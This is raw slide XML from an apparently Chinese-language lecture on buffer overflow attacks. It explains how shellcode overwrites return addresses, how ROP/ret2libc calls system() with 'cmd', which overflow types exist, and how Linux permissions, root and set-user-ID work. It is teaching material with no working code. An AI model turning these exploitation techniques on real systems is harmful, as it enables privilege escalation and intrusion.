            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者向缓冲区写入的数据包含了攻击代码（可执行的二进制代码，通常称为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），当发生缓冲区溢出时，溢出的数据覆盖掉一个可执行程序的入口地址（如函数的返回地址，函数指针变量等等），使得该地址指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，从而当程序试图通过该入口地址执行代码时，就会执行攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126876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zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475312" y="1455414"/>
            <a:ext cx="8015545" cy="4721451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击代码已经在被攻击的程序中了（通常是一些系统函数，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system(), exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等），攻击者所要做的只是为攻击代码传递它所需要的参数，然后用一个系统函数的地址覆盖可执行代码的入口地址，通过巧妙的构造可以使程序用预设的参数调用系统函数，比如用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为参数调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数，也称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret2libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283627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0780" y="1423535"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要分为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>格式化字符串溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394070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8638" y="2714625"/>
            <a:ext cx="4706937" cy="1035050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一、堆栈溢出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7578581-D780-45F0-A4A3-A2732E6D3126}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>多用户权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>是一个多用户系统， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>将全部的特权授予了一个称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>的管理员用户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>其它用户可以属于不同的组</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>文件的权限既是属于用户的也是属于组的，所以除非其他用户被明确的授权否则他们不能读你的文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>-Rw-rx-wx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>某些情况下需要允许某个非特权用户完成某一系统功能，而这一功能需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>特权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100462080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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内容提要</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1492898"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64523" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2102498" y="2633663"/>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24" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2381898" y="1976438"/>
            <a:ext cx="4591050" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64525" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1689748"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1492898" y="3319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64526" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2115198" y="3929063"/>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27" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2435873" y="3271838"/>
            <a:ext cx="4464050" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64528" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1689748" y="3417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64543"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en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 36"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1505598" y="4758690"/>
            <a:ext cx="762000" cy="665163"/>
            <a:chOff x="1110" y="2656"/>
            <a:chExt cx="1549" cy="1351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64549" name="AutoShape 37"/>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50" name="AutoShape 3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51" name="AutoShape 39"/>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64552" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2115198" y="5368290"/>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53" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2377137" y="4711065"/>
            <a:ext cx="4708842" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1702448" y="485711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F647D049-5A75-4BD5-9CD6-8C82FA82E5DF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="6870700" cy="1189038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进程的识别号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(ID)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1736725"/>
            <a:ext cx="7772400" cy="4206875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>真实用户识别号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>real user ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>真实用户组识别号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>real group ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>有效用户识别号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>effective user ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>有效用户组识别号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>effective group ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>一般情况真实用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>和有效用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>相同，都是运行该进程的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>当设置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>set-user-ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>标志位时，真实用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>仍是运行进程用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>而有效用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>变成了当前运行文件的所有者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>组识别号也是这样，区别在于设置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>set-group-ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>标志位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711975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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
